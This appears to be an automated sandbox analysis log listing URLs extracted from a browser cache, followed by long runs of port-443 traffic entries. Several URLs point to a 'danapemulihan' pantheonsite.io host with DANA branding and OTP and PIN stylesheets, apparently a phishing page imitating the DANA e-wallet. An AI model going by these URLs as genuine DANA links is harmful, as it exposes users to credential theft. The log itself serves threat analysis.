Source: chromecache_85.2.drString found in binary or memory: https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiftOkTXOPr5az8LHt3m-DZNiM0T98GalJ0P3bBLQK
Source: chromecache_85.2.drString found in binary or memory: https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilUMIG_IMFVixTFpWb4xA5f1HJt25lbv-cc1baknB
Source: chromecache_85.2.drString found in binary or memory: https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixR-U2gHP_VriGKaaVcf-_BbZmvWWoaRI8Wd26DYe
Source: chromecache_85.2.drString found in binary or memory: https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj8Fs3JMUwF85O07XgsV-e1rmQjTwS91jcu-zh3Lr
Source: chromecache_85.2.drString found in binary or memory: https://code.jquery.com/jquery-3.5.1.min.js
Source: chromecache_85.2.drString found in binary or memory: https://dev-danapemulihan.pantheonsite.io/asset/container.css
Source: chromecache_85.2.drString found in binary or memory: https://dev-danapemulihan.pantheonsite.io/asset/google.js
Source: chromecache_85.2.drString found in binary or memory: https://dev-danapemulihan.pantheonsite.io/asset/img/dana_logo.png
Source: chromecache_85.2.drString found in binary or memory: https://dev-danapemulihan.pantheonsite.io/asset/img/indo.png
Source: chromecache_85.2.drString found in binary or memory: https://dev-danapemulihan.pantheonsite.io/asset/img/load_bg.png
Source: chromecache_85.2.drString found in binary or memory: https://dev-danapemulihan.pantheonsite.io/asset/img/load_spin.png
Source: chromecache_85.2.drString found in binary or memory: https://dev-danapemulihan.pantheonsite.io/asset/jquery.mask.min.js
Source: chromecache_85.2.drString found in binary or memory: https://dev-danapemulihan.pantheonsite.io/asset/loader.css
Source: chromecache_85.2.drString found in binary or memory: https://dev-danapemulihan.pantheonsite.io/asset/main.css
Source: chromecache_85.2.drString found in binary or memory: https://dev-danapemulihan.pantheonsite.io/asset/otp.css
Source: chromecache_85.2.drString found in binary or memory: https://dev-danapemulihan.pantheonsite.io/asset/pin.css
Source: chromecache_85.2.drString found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQZ9dATs_nkzyO-gSoQWbtIhJV7bG51r3gOKg&usqp=CAU
Source: chromecache_101.2.drString found in binary or memory: https://fonts.googleapis.com/css2?family=Open
Source: chromecache_85.2.drString found in binary or memory: https://unpkg.com/ionicons
Source: chromecache_85.2.drString found in binary or memory: https://www.dana.id
Source: chromecache_85.2.drString found in binary or memory: https://www.dana.id/
Source: chromecache_85.2.drString found in binary or memory: https://www.dana.id/favicon.ico
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
